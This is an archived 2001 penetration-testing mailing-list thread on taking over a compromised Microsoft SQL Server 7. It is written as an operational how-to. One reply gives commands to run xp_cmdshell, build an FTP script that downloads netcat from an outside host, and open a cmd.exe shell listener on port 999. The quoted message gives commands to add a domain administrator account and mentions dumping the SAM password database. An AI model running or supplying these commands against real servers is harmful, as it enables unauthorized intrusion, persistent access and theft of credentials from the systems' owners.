Penetration Testing mailing list archives

Re: [PEN-TEST] Hacking a server through SQL SERVER 7

From: "Brentlinger, Mike (ISS eServices)" <mbrentli () ISS NET>
Date: Thu, 25 Jan 2001 14:38:33 -0500

Well if you were able to run commands via something like the net user
commands people told you about previously (ie  EXEC
[master].[dbo].[xp_cmdshell] "net user")

You could probably use something like the following commands to create a ftp
script file and then have their machine Ftp out to x.x.x.x and pull down
nc.exe

From there you can run netcat and you have a shell waiting for you to telnet

to.

make the script
   echo user>ftpScript.txt
   echo password>>ftpScript.txt
   echo bin>>ftpScript.txt
   echo get nc.exe>>ftpScript.txt
   echo bye>>ftpScript.txt

run the script to get netcat
   ftp -s:ftpScript.txt x.x.x.x
   del ftpScript.txt

run netcat
   nc -l -p 999 -t -e cmd.exe

Of course this all relies on your compromised SQL server being able to
connect to some server via FTP and requires you to be able to have access to
whatever port you open the shell on.

Best of luck
-Mike Brentlinger


-----Original Message-----
From: FiC
To: PEN-TEST () SECURITYFOCUS COM
Sent: 1/25/01 4:32 AM
Subject: Re: Hacking a server through SQL SERVER 7

Thank you all for your valuable information.

Is there anyway to upload/create a file in the hacked SQL SERVER through
the
system commands? I think that the machine is behind a Firewall and even
if I
start the FTP service I can't connect via ftp, and the port 139 is not
open
or its filtered. I've tried to create an .asp file with the "copy con"
command, but I can't do it through the SQL console. How can I
upload/create
an .asp file to this server?

Thanx.

Once you have access to a MSSQL 7 server via the "sa" account, you can

do

all sorts of fun things:

Run system commands:

EXEC [master].[dbo].[xp_cmdshell] "net user newuser newpass /ADD

/DOMAIN"

EXEC [master].[dbo].[xp_cmdshell] "net group 'Domain Admins' newuser

/ADD

/DOMAIN"

You can also access the registry, send email, dump system

information...

Take a look at some of the Extended Stored Procedures in the [master]
database with SQL Query Analyzer.  Depending on the user the server

runs at

(normally SYSTEM or Administrator), you can usually use xp_cmdshell to
rebuild the repair disk data with rdisk /s and snag the SAM database.

I will be giving a presentation at the upcoming CanSecWest conference
covering a variety of SQL server attacks, everything from general

procedure

exploitation to insertion techniques.  At the conference, I will be
releasing a handful of new tools, one of which exploits the RDS

component

in new ways, allowing access to SQL servers as well as proxying

requests to

internal systems through it.  For more information on the conference,
please see http://www.cansecwest.com, online registration should be
available within a few weeks.


--
~/ FiC /~

Current thread:

[PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Aaron C. Newman (Jan 23)
- <Possible follow-ups>
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Derrick K. Bennett (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 H D Moore (Jan 23)
  - Re: [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 25)
    - Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Attonbitus Deus (Jan 25)
    - Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Aaron C. Newman (Jan 25)
    - Re: [PEN-TEST] Hacking a server through SQL SERVER 7 MadHat (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Brentlinger, Mike (ISS eServices) (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Frank Knobbe (Jan 25)